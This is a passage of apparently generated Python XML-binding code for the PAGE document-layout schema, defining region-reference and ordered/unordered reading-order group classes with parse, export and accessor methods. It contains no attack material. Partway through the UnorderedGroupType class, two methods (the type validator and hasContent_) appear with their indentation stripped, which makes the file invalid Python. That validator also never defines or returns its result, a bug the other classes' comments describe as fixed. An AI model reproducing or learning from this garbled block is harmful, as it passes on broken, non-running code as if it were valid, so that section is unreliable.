            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this element's XML attributes from *node* into instance fields."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
        value = find_attr_value_('caption', node)
        if value is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            self.caption = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
        value = find_attr_value_('continuation', node)
        if value is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            # xsd:boolean accepts both word and numeric forms.
            if value in ('true', '1'):
                self.continuation = True
            elif value in ('false', '0'):
                self.continuation = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Dispatch on the child tag name and build the matching child object."""
        if nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
        elif nodeName_ == 'RegionRef':
            obj_ = RegionRefType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.RegionRef.append(obj_)
            obj_.original_tagname_ = 'RegionRef'
        elif nodeName_ == 'OrderedGroup':
            obj_ = OrderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.OrderedGroup.append(obj_)
            obj_.original_tagname_ = 'OrderedGroup'
        elif nodeName_ == 'UnorderedGroup':
            obj_ = UnorderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UnorderedGroup.append(obj_)
            obj_.original_tagname_ = 'UnorderedGroup'
# end class UnorderedGroupIndexedType
class RegionRefType(GeneratedsSuper):
    """Reference to a single region by id, used as a member of an unordered group."""
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('regionRef', 'string', 0, 0, {'use': 'required'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, regionRef=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create a RegionRefType (or registered subclass) instance."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, RegionRefType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if RegionRefType.subclass:
            return RegionRefType.subclass(*args_, **kwargs_)
        else:
            return RegionRefType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def hasContent_(self):
        # Fix: the generated body tested an empty-tuple condition ``if ( ):``,
        # which is always falsy.  This element has no children or text, so it
        # never has content and export() always emits a self-closing tag.
        return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefType', pretty_print=True):
        """Serialize this element as XML to *outfile*, indented at *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionRefType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'RegionRefType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionRefType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionRefType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionRefType'):
        """Write the required regionRef attribute."""
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefType', fromsubclass_=False, pretty_print=True):
        # No child elements defined for this type.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements defined for this type.
        pass
# end class RegionRefType
class OrderedGroupType(GeneratedsSuper):
    """Numbered group whose members carry explicit order indexes.

    ``regionRef`` is an optional link to a parent region of nested regions;
    the parent region doubles as a reading order group, and only the nested
    regions should be allowed as group members.  ``continuation`` records
    whether this group continues another group (from a previous column or
    page, for example).  ``custom`` is for generic use.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Attribute specs first, then child-element specs (generated from schema).
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
        MemberSpec_('RegionRefIndexed', 'RegionRefIndexedType', 1, 0, {'name': 'RegionRefIndexed', 'type': 'RegionRefIndexedType'}, 5),
        MemberSpec_('OrderedGroupIndexed', 'OrderedGroupIndexedType', 1, 0, {'name': 'OrderedGroupIndexed', 'type': 'OrderedGroupIndexedType'}, 5),
        MemberSpec_('UnorderedGroupIndexed', 'UnorderedGroupIndexedType', 1, 0, {'name': 'UnorderedGroupIndexed', 'type': 'UnorderedGroupIndexedType'}, 5),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, regionRef=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRefIndexed=None, OrderedGroupIndexed=None, UnorderedGroupIndexed=None, gds_collector_=None, **kwargs_):
        """Initialize attributes and child-element lists (fresh lists per instance)."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
        self.caption = _cast(None, caption)
        self.caption_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.continuation = _cast(bool, continuation)
        self.continuation_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
        if RegionRefIndexed is None:
            self.RegionRefIndexed = []
        else:
            self.RegionRefIndexed = RegionRefIndexed
        self.RegionRefIndexed_nsprefix_ = "pc"
        if OrderedGroupIndexed is None:
            self.OrderedGroupIndexed = []
        else:
            self.OrderedGroupIndexed = OrderedGroupIndexed
        self.OrderedGroupIndexed_nsprefix_ = "pc"
        if UnorderedGroupIndexed is None:
            self.UnorderedGroupIndexed = []
        else:
            self.UnorderedGroupIndexed = UnorderedGroupIndexed
        self.UnorderedGroupIndexed_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an OrderedGroupType (or registered subclass) instance."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, OrderedGroupType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if OrderedGroupType.subclass:
            return OrderedGroupType.subclass(*args_, **kwargs_)
        else:
            return OrderedGroupType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    # --- Child-element accessors (generateDS convention) ---
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    def get_RegionRefIndexed(self):
        return self.RegionRefIndexed
    def set_RegionRefIndexed(self, RegionRefIndexed):
        self.RegionRefIndexed = RegionRefIndexed
    def add_RegionRefIndexed(self, value):
        self.RegionRefIndexed.append(value)
    def insert_RegionRefIndexed_at(self, index, value):
        self.RegionRefIndexed.insert(index, value)
    def replace_RegionRefIndexed_at(self, index, value):
        self.RegionRefIndexed[index] = value
    def get_OrderedGroupIndexed(self):
        return self.OrderedGroupIndexed
    def set_OrderedGroupIndexed(self, OrderedGroupIndexed):
        self.OrderedGroupIndexed = OrderedGroupIndexed
    def add_OrderedGroupIndexed(self, value):
        self.OrderedGroupIndexed.append(value)
    def insert_OrderedGroupIndexed_at(self, index, value):
        self.OrderedGroupIndexed.insert(index, value)
    def replace_OrderedGroupIndexed_at(self, index, value):
        self.OrderedGroupIndexed[index] = value
    def get_UnorderedGroupIndexed(self):
        return self.UnorderedGroupIndexed
    def set_UnorderedGroupIndexed(self, UnorderedGroupIndexed):
        self.UnorderedGroupIndexed = UnorderedGroupIndexed
    def add_UnorderedGroupIndexed(self, value):
        self.UnorderedGroupIndexed.append(value)
    def insert_UnorderedGroupIndexed_at(self, index, value):
        self.UnorderedGroupIndexed.insert(index, value)
    def replace_UnorderedGroupIndexed_at(self, index, value):
        self.UnorderedGroupIndexed[index] = value
    # --- XML attribute accessors ('type' stored as 'type_') ---
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def get_caption(self):
        return self.caption
    def set_caption(self, caption):
        self.caption = caption
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_continuation(self):
        return self.continuation
    def set_continuation(self, continuation):
        self.continuation = continuation
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def validate_GroupTypeSimpleType(self, value):
        """Validate *value* against the pc:GroupTypeSimpleType enumeration.

        Returns True when the value is acceptable (or when validation is
        disabled / no collector is attached), False otherwise.  Problems are
        also reported through ``self.gds_collector_``.
        """
        # Fix: the generated body assigned ``result = False`` but never
        # initialized or returned it, so the method always returned None.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when any child element is present and must be serialized."""
        if (
            self.UserDefined is not None or
            self.Labels or
            self.RegionRefIndexed or
            self.OrderedGroupIndexed or
            self.UnorderedGroupIndexed
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupType', pretty_print=True):
        """Serialize this element as XML to *outfile*, indented at *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('OrderedGroupType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'OrderedGroupType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='OrderedGroupType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='OrderedGroupType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='OrderedGroupType'):
        """Write this element's XML attributes; *already_processed* guards against duplicates."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
        if self.caption is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.continuation is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order: UserDefined, Labels, then indexed members."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
        for RegionRefIndexed_ in self.RegionRefIndexed:
            namespaceprefix_ = self.RegionRefIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRefIndexed_nsprefix_) else ''
            RegionRefIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRefIndexed', pretty_print=pretty_print)
        for OrderedGroupIndexed_ in self.OrderedGroupIndexed:
            namespaceprefix_ = self.OrderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroupIndexed_nsprefix_) else ''
            OrderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroupIndexed', pretty_print=pretty_print)
        for UnorderedGroupIndexed_ in self.UnorderedGroupIndexed:
            namespaceprefix_ = self.UnorderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroupIndexed_nsprefix_) else ''
            UnorderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroupIndexed', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this element's XML attributes from *node* into instance fields."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
        value = find_attr_value_('caption', node)
        if value is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            self.caption = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
        value = find_attr_value_('continuation', node)
        if value is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            # xsd:boolean accepts both word and numeric forms.
            if value in ('true', '1'):
                self.continuation = True
            elif value in ('false', '0'):
                self.continuation = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Dispatch on the child tag name and build the matching child object."""
        if nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
        elif nodeName_ == 'RegionRefIndexed':
            obj_ = RegionRefIndexedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.RegionRefIndexed.append(obj_)
            obj_.original_tagname_ = 'RegionRefIndexed'
        elif nodeName_ == 'OrderedGroupIndexed':
            obj_ = OrderedGroupIndexedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.OrderedGroupIndexed.append(obj_)
            obj_.original_tagname_ = 'OrderedGroupIndexed'
        elif nodeName_ == 'UnorderedGroupIndexed':
            obj_ = UnorderedGroupIndexedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UnorderedGroupIndexed.append(obj_)
            obj_.original_tagname_ = 'UnorderedGroupIndexed'
# end class OrderedGroupType
class UnorderedGroupType(GeneratedsSuper):
    """Numbered group containing unordered elements.

    ``regionRef`` is an optional link to a parent region of nested regions;
    the parent region doubles as a reading order group, and only the nested
    regions should be allowed as group members.  ``continuation`` records
    whether this group continues another group (from a previous column or
    page, for example).  ``custom`` is for generic use.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Attribute specs first, then child-element specs (generated from schema).
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
        MemberSpec_('RegionRef', 'RegionRefType', 1, 0, {'name': 'RegionRef', 'type': 'RegionRefType'}, 6),
        MemberSpec_('OrderedGroup', 'OrderedGroupType', 1, 0, {'name': 'OrderedGroup', 'type': 'OrderedGroupType'}, 6),
        MemberSpec_('UnorderedGroup', 'UnorderedGroupType', 1, 0, {'name': 'UnorderedGroup', 'type': 'UnorderedGroupType'}, 6),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, regionRef=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRef=None, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
        """Initialize attributes and child-element lists (fresh lists per instance)."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
        self.caption = _cast(None, caption)
        self.caption_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.continuation = _cast(bool, continuation)
        self.continuation_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
        if RegionRef is None:
            self.RegionRef = []
        else:
            self.RegionRef = RegionRef
        self.RegionRef_nsprefix_ = "pc"
        if OrderedGroup is None:
            self.OrderedGroup = []
        else:
            self.OrderedGroup = OrderedGroup
        self.OrderedGroup_nsprefix_ = "pc"
        if UnorderedGroup is None:
            self.UnorderedGroup = []
        else:
            self.UnorderedGroup = UnorderedGroup
        self.UnorderedGroup_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an UnorderedGroupType (or registered subclass) instance."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, UnorderedGroupType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if UnorderedGroupType.subclass:
            return UnorderedGroupType.subclass(*args_, **kwargs_)
        else:
            return UnorderedGroupType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    # --- Child-element accessors (generateDS convention) ---
    # Labels, RegionRef, OrderedGroup and UnorderedGroup are held as lists;
    # each gets get/set plus add/insert/replace helpers for positional edits.
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    def get_RegionRef(self):
        return self.RegionRef
    def set_RegionRef(self, RegionRef):
        self.RegionRef = RegionRef
    def add_RegionRef(self, value):
        self.RegionRef.append(value)
    def insert_RegionRef_at(self, index, value):
        self.RegionRef.insert(index, value)
    def replace_RegionRef_at(self, index, value):
        self.RegionRef[index] = value
    def get_OrderedGroup(self):
        return self.OrderedGroup
    def set_OrderedGroup(self, OrderedGroup):
        self.OrderedGroup = OrderedGroup
    def add_OrderedGroup(self, value):
        self.OrderedGroup.append(value)
    def insert_OrderedGroup_at(self, index, value):
        self.OrderedGroup.insert(index, value)
    def replace_OrderedGroup_at(self, index, value):
        self.OrderedGroup[index] = value
    def get_UnorderedGroup(self):
        return self.UnorderedGroup
    def set_UnorderedGroup(self, UnorderedGroup):
        self.UnorderedGroup = UnorderedGroup
    def add_UnorderedGroup(self, value):
        self.UnorderedGroup.append(value)
    def insert_UnorderedGroup_at(self, index, value):
        self.UnorderedGroup.insert(index, value)
    def replace_UnorderedGroup_at(self, index, value):
        self.UnorderedGroup[index] = value
    # --- XML attribute accessors ('type' stored as 'type_') ---
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def get_caption(self):
        return self.caption
    def set_caption(self, caption):
        self.caption = caption
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_continuation(self):
        return self.continuation
    def set_continuation(self, continuation):
        self.continuation = continuation
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
def validate_GroupTypeSimpleType(self, value):
# Validate type pc:GroupTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.UserDefined is not None or
self.Labels or
self.RegionRef or
self.OrderedGroup or
self.UnorderedGroup
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupType', pretty_print=True):
        """Serialize this element to *outfile* as XML: open tag, attributes,
        children (via exportChildren), close tag, indented at *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('UnorderedGroupType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # If this object was parsed from XML, re-export under its original tag name.
        if self.original_tagname_ is not None and name_ == 'UnorderedGroupType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnorderedGroupType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UnorderedGroupType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No child content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UnorderedGroupType'):
        """Write this element's XML attributes to *outfile*; attribute names
        already present in *already_processed* are skipped (and each one
